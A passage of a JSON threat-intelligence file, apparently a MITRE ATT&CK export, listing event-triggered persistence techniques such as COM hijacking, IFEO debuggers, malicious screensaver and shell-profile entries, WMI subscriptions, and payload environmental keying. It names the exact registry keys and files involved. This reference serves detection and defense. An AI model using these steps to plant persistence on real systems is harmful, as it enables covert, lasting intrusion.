"description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.<sup>[[Microsoft Component Object Model](https://app.tidalcyber.com/references/e1bb3872-7748-4e64-818f-6187a20d59f0)]</sup> References to various COM objects are stored in the Registry. \n\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.<sup>[[GDATA COM Hijacking](https://app.tidalcyber.com/references/98e88505-b916-430d-aef6-616ba7ddd88e)]</sup> An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.015"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "3e1ef5ba-6426-4fe0-ad48-78557667d680",
"value": "Component Object Model Hijacking"
},
{
"description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.<sup>[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)]</sup><sup>[[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup>\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.<sup>[[xorrior emond Jan 2018](https://app.tidalcyber.com/references/b49649ec-28f0-4d30-ab6c-13b12fca36e8)]</sup><sup>[[magnusviri emond Apr 2016](https://app.tidalcyber.com/references/373f64a5-a30f-4b6e-b352-d0c6f8b65fdb)]</sup><sup>[[sentinelone macos persist Jun 2019](https://app.tidalcyber.com/references/81a49043-cac5-40e0-a626-fd242d21c56d)]</sup> Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) service.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.014"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "7f9dbafd-4c7e-4bd9-8aff-c2a800743a07",
"value": "Emond"
},
{
"description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an applications IFEO will be prepended to the applications name, effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe -g notepad.exe</code>). <sup>[[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]</sup>\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. <sup>[[Microsoft GFlags Mar 2017](https://app.tidalcyber.com/references/9c11c382-b420-4cf9-9db2-eaa7b60aee2d)]</sup> IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached. <sup>[[Microsoft Dev Blog IFEO Mar 2010](https://app.tidalcyber.com/references/4c62c2cb-bee2-4fc0-aa81-65d66e71a5c2)]</sup>\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). <sup>[[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)]</sup> <sup>[[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]</sup> Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\</code>. <sup>[[Microsoft Silent Process Exit NOV 2017](https://app.tidalcyber.com/references/86896031-f654-4185-ba45-8c931903153b)]</sup> <sup>[[Oddvar Moe IFEO APR 2018](https://app.tidalcyber.com/references/8661b51c-ddb7-484f-919d-22079c39d1e4)]</sup>\n\nSimilar to [Accessibility Features](https://app.tidalcyber.com/technique/9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the \"debugger\" program to be executed with SYSTEM privileges. <sup>[[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]</sup>\n\nSimilar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) by registering invalid debuggers that redirect and effectively disable various system and security applications. <sup>[[FSecure Hupigon](https://app.tidalcyber.com/references/08ceb57f-065e-45e9-98e9-d58a92caa755)]</sup> <sup>[[Symantec Ushedix June 2008](https://app.tidalcyber.com/references/9df2b407-df20-403b-ba1b-a681b9c74c7e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.012"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "91d813d3-c17c-4c4c-b86e-0667f669a2f4",
"value": "Image File Execution Options Injection"
},
{
"description": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.<sup>[[Installer Package Scripting Rich Trouton](https://app.tidalcyber.com/references/7a877b67-ac4b-4d82-860a-75b5f0b8daae)]</sup>\n\nUsing legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)) with the elevated permissions.<sup>[[Application Bundle Manipulation Brandon Dalton](https://app.tidalcyber.com/references/2a8fd573-6ab0-403b-b813-88d9d3edab36)]</sup><sup>[[wardle evilquest parti](https://app.tidalcyber.com/references/1ebd91db-9b56-442f-bb61-9e154b5966ac)]</sup>\n\nDepending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.\n\nFor Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.<sup>[[Windows AppleJeus GReAT](https://app.tidalcyber.com/references/336ea5f5-d8cc-4af5-9aa0-203e319b3c28)]</sup><sup>[[Debian Manual Maintainer Scripts](https://app.tidalcyber.com/references/e32e293a-f583-494e-9eb5-c82167f2e000)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.016"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "8b8c0f91-17fb-41fe-905c-9cbf45593877",
"value": "Installer Packages"
},
{
"description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.<sup>[[Writing Bad Malware for OSX](https://app.tidalcyber.com/references/5628ecd9-48da-4a50-94ba-4b70abe56089)]</sup> There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isnt checked at load time.<sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.006"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "cd52d338-ba23-43c8-975d-4db29aa96598",
"value": "LC_LOAD_DYLIB Addition"
},
{
"description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.<sup>[[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]</sup> The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.<sup>[[Github Netsh Helper CS Beacon](https://app.tidalcyber.com/references/c3169722-9c32-4a38-a7fe-8d4b6e51ca36)]</sup><sup>[[Demaske Netsh Persistence](https://app.tidalcyber.com/references/663b3fd6-0dd6-45c8-afba-dc0ea6d331b5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.007"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "b2cae050-4916-44c0-a6a3-3fa257145872",
"value": "Netsh Helper DLL"
},
{
"description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) starts and can be used as a logon script to customize user environments.\n\n[PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. <sup>[[Microsoft About Profiles](https://app.tidalcyber.com/references/1da63665-7a96-4bc3-9606-a3575b913819)]</sup> \n\nAdversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) drives to gain persistence. Every time a user opens a [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. <sup>[[ESET Turla PowerShell May 2019](https://app.tidalcyber.com/references/68c0f34b-691a-4847-8d49-f18b7f4e5188)]</sup> \n\nAn adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. <sup>[[Wits End and Shady PowerShell Profiles](https://app.tidalcyber.com/references/8fcbd99a-1fb8-4ca3-9efd-a98734d4397d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.013"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "6e65f84b-cfad-49ce-9072-f2966dc02f56",
"value": "PowerShell Profile"
},
{
"description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.<sup>[[Wikipedia Screensaver](https://app.tidalcyber.com/references/b5d69465-27df-4acc-b6cc-f51be8780b7b)]</sup> The Windows screensaver application scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and <code>C:\\Windows\\sysWOW64\\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (<code>HKCU\\Control Panel\\Desktop\\</code>) and could be manipulated to achieve persistence:\n\n* <code>SCRNSAVE.exe</code> - set to malicious PE path\n* <code>ScreenSaveActive</code> - set to '1' to enable the screensaver\n* <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock\n* <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.<sup>[[ESET Gazer Aug 2017](https://app.tidalcyber.com/references/9d1c40af-d4bc-4d4a-b667-a17378942685)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "3f9cd334-0b86-478f-97fa-c3aedd8035d8",
"value": "Screensaver"
},
{
"description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where \"command list\" will be executed when \"signals\" are received.<sup>[[Trap Manual](https://app.tidalcyber.com/references/143462e1-b7e8-4e18-9cb1-6f4f3969e891)]</sup><sup>[[Cyberciti Trap Statements](https://app.tidalcyber.com/references/24cf5471-f327-4407-b32f-055537f3495e)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.005"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "82c07e34-9f67-4f4e-a513-c22a17b508e5",
"value": "Trap"
},
{
"description": "Adversaries may establish persistence through executing malicious commands triggered by a users shell. User [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the users home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the users environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.<sup>[[intezer-kaiji-malware](https://app.tidalcyber.com/references/ef1fbb40-da6f-41d0-a44a-9ff444e2ad89)]</sup><sup>[[bencane blog bashrc](https://app.tidalcyber.com/references/503a4cd6-5cfe-4cce-b363-0cf3c8bc9feb)]</sup> These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely.<sup>[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)]</sup><sup>[[Linux manual bash invocation](https://app.tidalcyber.com/references/06185cbd-6635-46c7-9783-67bd8742b66f)]</sup> Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.<sup>[[Tsunami](https://app.tidalcyber.com/references/95b5b03e-f160-47cf-920c-8f4f3d4114a3)]</sup><sup>[[anomali-rocke-tactics](https://app.tidalcyber.com/references/2308c5ca-04a4-43c5-b92b-ffa6a60ae3a9)]</sup><sup>[[anomali-linux-rabbit](https://app.tidalcyber.com/references/ec413dc7-028c-4153-9e98-abe85961747f)]</sup><sup>[[Magento](https://app.tidalcyber.com/references/b8b3f360-e14c-49ea-a4e5-8d6d9727e731)]</sup> Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.<sup>[[ScriptingOSX zsh](https://app.tidalcyber.com/references/08b390aa-863b-420e-9b00-e168e3c756d8)]</sup><sup>[[PersistentJXA_leopitt](https://app.tidalcyber.com/references/2d66932e-1b73-4255-a9a8-ea8effb3a776)]</sup><sup>[[code_persistence_zsh](https://app.tidalcyber.com/references/b76d3ed0-e484-4ed1-aa6b-892a6f34e478)]</sup><sup>[[macOS MS office sandbox escape](https://app.tidalcyber.com/references/759e81c1-a250-440e-8b52-178bcf5451b9)]</sup> The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "cc5ae19f-981d-4004-bb74-260b8ebad73a",
"value": "Unix Shell Configuration Modification"
},
{
"description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.<sup>[[Mandiant M-Trends 2015](https://app.tidalcyber.com/references/067497eb-17d9-465f-a070-495575f420d7)]</sup>\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.<sup>[[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)]</sup><sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup> Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.<sup>[[Dell WMI Persistence](https://app.tidalcyber.com/references/a88dd548-ac8f-4297-9e23-de2643294846)]</sup><sup>[[Microsoft MOF May 2018](https://app.tidalcyber.com/references/1d1da9ad-c995-4040-8103-b51af9d8bac3)]</sup>\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1546.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "043ffb62-dacd-4e21-9c86-b31826176283",
"value": "Windows Management Instrumentation Event Subscription"
},
{
"description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup><sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.<sup>[[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]</sup><sup>[[Malware Persistence on OS X](https://app.tidalcyber.com/references/d4e3b066-c439-4284-ba28-3b8bd8ec270e)]</sup><sup>[[amnesia malware](https://app.tidalcyber.com/references/489a6c57-f64c-423b-a7bd-169fa36c4cdf)]</sup>\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba",
"type": "similar"
},
{
"dest-uuid": "4216058d-0912-4ff3-a7fd-dd7a7b346c96",
"type": "similar"
},
{
"dest-uuid": "36b58363-ca6a-4614-bf6f-bfaecafedb5f",
"type": "similar"
},
{
"dest-uuid": "efbbe9d1-274c-4383-9c6c-44bd4eca1829",
"type": "similar"
},
{
"dest-uuid": "9cfbe3ba-957e-49fd-9494-9870e5d0ae16",
"type": "similar"
},
{
"dest-uuid": "3e1ef5ba-6426-4fe0-ad48-78557667d680",
"type": "similar"
},
{
"dest-uuid": "7f9dbafd-4c7e-4bd9-8aff-c2a800743a07",
"type": "similar"
},
{
"dest-uuid": "91d813d3-c17c-4c4c-b86e-0667f669a2f4",
"type": "similar"
},
{
"dest-uuid": "8b8c0f91-17fb-41fe-905c-9cbf45593877",
"type": "similar"
},
{
"dest-uuid": "cd52d338-ba23-43c8-975d-4db29aa96598",
"type": "similar"
},
{
"dest-uuid": "b2cae050-4916-44c0-a6a3-3fa257145872",
"type": "similar"
},
{
"dest-uuid": "6e65f84b-cfad-49ce-9072-f2966dc02f56",
"type": "similar"
},
{
"dest-uuid": "3f9cd334-0b86-478f-97fa-c3aedd8035d8",
"type": "similar"
},
{
"dest-uuid": "82c07e34-9f67-4f4e-a513-c22a17b508e5",
"type": "similar"
},
{
"dest-uuid": "cc5ae19f-981d-4004-bb74-260b8ebad73a",
"type": "similar"
},
{
"dest-uuid": "043ffb62-dacd-4e21-9c86-b31826176283",
"type": "similar"
}
],
"uuid": "e1e42979-d3cd-461b-afc4-a6373cbf97ba",
"value": "Event Triggered Execution"
},
{
"description": "Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.<sup>[[EK Clueless Agents](https://app.tidalcyber.com/references/ef7409d2-af39-4ad8-8469-76f0165687bd)]</sup>\n\nValues can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[Proofpoint Router Malvertising](https://app.tidalcyber.com/references/b964139f-7c02-451d-8d22-a87975e60aa2)]</sup><sup>[[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)]</sup><sup>[[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup> By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup> These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).\n\nSimilar to [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup><sup>[[EK Impeding Malware Analysis](https://app.tidalcyber.com/references/c3e6c8da-1399-419c-96f5-7dade6fccd29)]</sup><sup>[[Environmental Keyed HTA](https://app.tidalcyber.com/references/b16bae1a-75aa-478b-b8c7-458ee5a3f7e5)]</sup><sup>[[Ebowla: Genetic Malware](https://app.tidalcyber.com/references/8c65dbc1-33ad-470c-b172-7497c6fd2480)]</sup><sup>[[Demiguise Guardrail Router Logo](https://app.tidalcyber.com/references/2e55d33a-fe75-4397-b6f0-a28d397b4c24)]</sup> By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.<sup>[[Kaspersky Gauss Whitepaper](https://app.tidalcyber.com/references/4bf39390-f3ca-4132-841e-b35abefe7dee)]</sup> This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.\n\nLike other [Execution Guardrails](https://app.tidalcyber.com/technique/aca9cbac-5c11-4050-8d9c-2a947c89a1e8), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8). While use of [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1480.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ac10844f-e4ab-44a2-97b4-3d74a1fc046c",
"value": "Environmental Keying"
},
{
